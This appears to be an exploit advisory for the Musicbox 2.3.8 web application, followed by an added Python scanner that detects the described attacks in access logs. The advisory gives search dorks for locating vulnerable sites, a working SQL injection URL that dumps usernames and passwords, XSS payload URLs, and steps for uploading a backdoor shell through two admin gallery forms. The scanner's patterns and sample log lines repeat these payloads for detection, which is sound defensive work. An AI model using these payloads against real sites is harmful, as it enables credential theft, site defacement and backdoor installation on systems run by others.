#Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 25/08/2013
#Category : Web Applications
#Vendor : http://www.musicboxv2.com/
#Version : 1.0 - 2.3.8

#Dork
intext:Musicbox Version
intext:Musicbox Version 2.3.8 © 2008
inurl:genre_albums.php?id=

#Vulnerability : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability
#Tested On : Windows 7 32 Bit (Mozilla & Chrome)
#Greetz : Newbie-Security.or.id

SQL Injection Vulnerability

http://site-target/genre_albums.php?id=[SQLI]

Example

http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

==========================================================================================

Cross site scripting / XSS Vulnerability

*Search

1. Go to the Search feature
2. Input your Cross Site Scripting payload, example "<h1>Tested by DevilScreaM</h1>", and click Search
3. See the result

or see it with the URL

http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0

Example

http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0

========================================================================================

*News Profile

1. Register on the website or go to the link http://site-target/register.php
2. Log in to the website
3. Go to menu [ My News ]
4. In the News Heading, input your XSS, example <h1>Tested by DevilScreaM</h1>
   and in Details input your XSS or text

See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]

Example

http://server/musicbox/member.php?uname=devilscream

==========================================================================================

Shell Upload Vulnerability

*Artist Gallery

1. Go to the admin page and log in
2. Go to Upload Artist Image or go to the link
   http://site-target/admin/adminpanel.php?action=artistgallery
3. Select your shell/backdoor and click Submit
4. The upload appears at
   http://site-target/artist_gallery/Your_Backdoor.php

============================================================================================

*Album Gallery

1. Go to the admin page and log in
2. Go to Upload Album Image or go to the link
   http://site-target/admin/adminpanel.php?action=albumgallery
3. Select an option, example option "All Album", and click Submit
4. Select your shell/backdoor and click Submit
5. The upload appears at
   http://site-target/album_gallery/Your_Backdoor.php

==========================================================================================
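As an added defender-side example (not part of the original advisory), a Python scanner that flags the three request shapes described above in web-server access logs: the genre_albums.php id injection, HTML tags in the search term, and PHP files requested from the two gallery upload directories. The log lines are constructed samples and the rule labels are my own names.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format), not from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Aug/2013:10:00:01 +0000] "GET /genre_albums.php?id=3 HTTP/1.1" 200 5120
10.0.0.9 - - [25/Aug/2013:10:00:07 +0000] "GET /genre_albums.php?id=-3+UNION+SELECT+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users-- HTTP/1.1" 200 6033
10.0.0.9 - - [25/Aug/2013:10:01:15 +0000] "GET /index.php?in=song&term=%3Ch1%3ETested%3C/h1%3E&action=search&start=0 HTTP/1.1" 200 4410
10.0.0.9 - - [25/Aug/2013:10:03:40 +0000] "GET /artist_gallery/Your_Backdoor.php HTTP/1.1" 200 312
10.0.0.7 - - [25/Aug/2013:10:04:02 +0000] "GET /artist_gallery/band.jpg HTTP/1.1" 200 81234
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<url>\S+) [^"]*" \d{3}')
SQLI_RE = re.compile(r"union\s+select|concat_ws\s*\(|--\s*$", re.IGNORECASE)
XSS_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*[^>]*>", re.IGNORECASE)
# The two directories the advisory names as upload targets; PHP files there are never expected.
UPLOAD_DIRS = ("/artist_gallery/", "/album_gallery/")
SCRIPT_EXT = re.compile(r"\.(php|phtml|php[3-7]|phar)$", re.IGNORECASE)

def classify(url):
    """Return the rule labels (my own names) that a single request URL triggers; [] if benign."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %xx and '+'
    findings = []
    if parts.path.endswith("/genre_albums.php"):
        for v in params.get("id", []):
            if SQLI_RE.search(unquote_plus(v)):  # second decode catches double-encoded input
                findings.append("sqli:genre_albums.id")
    if parts.path.endswith("/index.php"):
        for v in params.get("term", []):
            if XSS_RE.search(unquote_plus(v)):
                findings.append("xss:search.term")
    if parts.path.startswith(UPLOAD_DIRS) and SCRIPT_EXT.search(parts.path):
        findings.append("webshell:script_in_gallery")
    return findings

def scan_log(text):
    """Return (client_ip, url, labels) for every log line that triggers at least one rule."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            labels = classify(m.group("url"))
            if labels:
                hits.append((m.group("ip"), m.group("url"), labels))
    return hits

if __name__ == "__main__":
    for ip, url, labels in scan_log(SAMPLE_LOG):
        print(ip, ",".join(labels), url)
```

Point it at a real access log by replacing SAMPLE_LOG with the file contents; a hit on the webshell rule should also be cross-checked against the gallery directory on disk, since a 200 response there means the file exists and executes.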